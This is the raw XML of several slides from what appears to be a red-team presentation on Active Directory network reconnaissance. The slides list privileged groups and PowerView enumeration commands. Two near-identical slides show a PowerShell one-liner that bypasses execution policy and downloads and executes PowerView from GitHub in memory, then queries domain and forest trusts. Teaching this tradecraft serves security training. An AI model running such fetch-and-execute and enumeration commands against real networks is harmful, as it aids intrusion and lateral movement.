          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Network Recon  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EAF55B8-2D2C-43A7-B1E1-BC84BF0E7587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2137186459"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="352337" y="867377"/>
          <a:ext cx="11487326" cy="5820384"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{69012ECD-51FC-41F1-AA8D-1B2483CD663E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5743663">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5743663">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="773804">
                <a:tc gridSpan="2">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4400" dirty="0"/>
                        <a:t>Privileged Accounts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dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="658078">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Enterprise Admins</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Account Operators</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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658078">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Domain Admins</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Backup Operators</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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658078">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Schema Admin</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Print Operators</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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658078">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>BUILTIN\Administrators</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Server Operators</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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1207134">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Domain Controllers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Group Policy Creators Owners</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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1207134">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Read-only Domain Controllers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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3600" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Cryptographic Operators</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3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330925834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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="1482394"/>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Network Recon  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting the Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71CFF19-8733-4DCF-85C1-CB944C763010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420147" y="1384999"/>
            <a:ext cx="10470493" cy="4970591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>PowerView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>*Also included in Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A few Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>FindLocalAdminAccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>CheckLocalAdminAccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ShareFinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>CheckAdmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>NetLocalGroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ListGroups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> &lt;workstation&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>EnumerateLocalAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	--(returns the local admin group for each machine in the domain)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96232545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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="94736"/>
            <a:ext cx="12109142" cy="1482394"/>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Network Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>PowerView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> ~ Chaining commands together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71CFF19-8733-4DCF-85C1-CB944C763010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118143" y="1772115"/>
            <a:ext cx="4336412" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> -exec bypass -c "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>('https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>PowerShellMafia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/master/Recon/PowerView.ps1'); Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05606CD-904D-4AD5-8543-725FDB78CE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4672668" y="1772114"/>
            <a:ext cx="7401189" cy="4813243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FDD8DF-3CEE-4B1D-B853-DF3B0E2236AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11182526" y="6306304"/>
            <a:ext cx="891331" cy="25167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0643318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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="94736"/>
            <a:ext cx="12109142" cy="1482394"/>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Network Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>PowerView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> ~ Chaining commands together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71CFF19-8733-4DCF-85C1-CB944C763010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118143" y="1772115"/>
            <a:ext cx="4336412" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -exec bypass -c "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShellMafia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/master/Recon/PowerView.ps1'); Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
